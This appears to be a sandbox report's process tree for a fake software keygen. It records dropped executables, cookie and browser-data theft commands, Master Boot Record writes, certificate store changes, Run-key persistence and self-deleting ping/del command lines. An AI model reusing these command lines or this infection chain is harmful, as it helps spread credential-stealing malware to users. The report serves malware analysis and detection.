PID:4380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵PID:4372
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:82⤵PID:4500
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:82⤵PID:4548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:82⤵PID:4584
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5700 /prefetch:82⤵PID:4640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:4340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:82⤵PID:2204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:82⤵PID:4800
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:82⤵PID:4948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6248 /prefetch:82⤵PID:4908
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:82⤵PID:4860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:4984
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:82⤵PID:2456
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:82⤵PID:5116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:82⤵PID:4992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵PID:4480
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5072 /prefetch:82⤵PID:4332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6340 /prefetch:82⤵PID:4388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:82⤵PID:4512
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:82⤵PID:1408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:82⤵PID:4304
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6632 /prefetch:82⤵PID:4784
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:82⤵PID:4900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:82⤵PID:4408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵PID:5020
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6940 /prefetch:82⤵PID:5032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:82⤵PID:2240
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7268 /prefetch:82⤵PID:4940
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7424 /prefetch:82⤵PID:4892
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:12⤵PID:4576
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:82⤵PID:4568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7704 /prefetch:82⤵PID:4356
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7984 /prefetch:82⤵PID:3100
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7824 /prefetch:82⤵PID:4428
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4888 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:82⤵PID:4872
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:82⤵PID:5000
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:12⤵PID:4532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:4968
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:12⤵PID:4412
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4972 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7012 /prefetch:82⤵PID:1604
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7596 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4120 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5608 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1636 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1468,790526323759411747,4814321052223099968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:82⤵PID:4440
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\Temp2_CYME.CYMGRD.v6.3.R7.keygen.zip\CYME.CYMGRD.v6.3.R7.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_CYME.CYMGRD.v6.3.R7.keygen.zip\CYME.CYMGRD.v6.3.R7.keygen.exe"1⤵PID:4836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:4264 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:224 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2372 -
C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe"C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3316 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A9E8.tmp.exe"5⤵PID:312
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵PID:3932
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:836 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:4784
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:4816 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
PID:2948 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:1720 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵PID:3176
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
PID:1768 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:1868
-
C:\Users\Admin\AppData\Roaming\1613221200584.exe"C:\Users\Admin\AppData\Roaming\1613221200584.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221200584.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4708 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:4444
-
C:\Users\Admin\AppData\Roaming\1613221205193.exe"C:\Users\Admin\AppData\Roaming\1613221205193.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221205193.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:936 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:2452
-
C:\Users\Admin\AppData\Roaming\1613221211146.exe"C:\Users\Admin\AppData\Roaming\1613221211146.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613221211146.txt"6⤵
- Executes dropped EXE
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-C7E35.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-C7E35.tmp\23E04C4F32EF2158.tmp" /SL5="$F007A,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:5556
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:5340
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:5332
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:5704
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"6⤵PID:5864
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4736 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵PID:4684
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 27245⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
PID:4344 -
C:\Users\Admin\AppData\Roaming\E309.tmp.exe"C:\Users\Admin\AppData\Roaming\E309.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4888 -
C:\Users\Admin\AppData\Roaming\E309.tmp.exe"C:\Users\Admin\AppData\Roaming\E309.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:2220
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:4496 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\installer.exe"5⤵
- Executes dropped EXE
PID:4612 -
C:\ProgramData\5074078.55"C:\ProgramData\5074078.55"6⤵
- Executes dropped EXE
PID:1636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 7247⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4768 -
C:\ProgramData\2817902.30"C:\ProgramData\2817902.30"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3680 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"7⤵
- Executes dropped EXE
PID:4068 -
C:\ProgramData\3445854.37"C:\ProgramData\3445854.37"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4332 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:1736
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 430DE61C9B5218932B173B697DB1350F C2⤵
- Loads dropped DLL
PID:4600 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A62064E2F6464893B8AE2E4AF4172933 C2⤵
- Loads dropped DLL
PID:5008 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:196
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F03DE09F0016AE7F50C652AA3A376ECD C2⤵PID:5268
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 955B7C988339B0F130CFF78A063AC440 C2⤵PID:6060
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 38987AE37239BB2DCFB2EE7B4E397B89 C2⤵PID:6912
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FCFE22162F01778225AECF5262178DF8 C2⤵PID:5152
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E0E820D0491BF02039A2C32C31076016 C2⤵PID:7488
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D09EF44EB48407C0380902518CCC4DCB C2⤵PID:2152
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 281BC88A42BBD1476C89D946E7D380D6 C2⤵PID:1288
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F41C02364BA54DE1C1D3E0F43FCA24AF C2⤵PID:5136
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4316
-
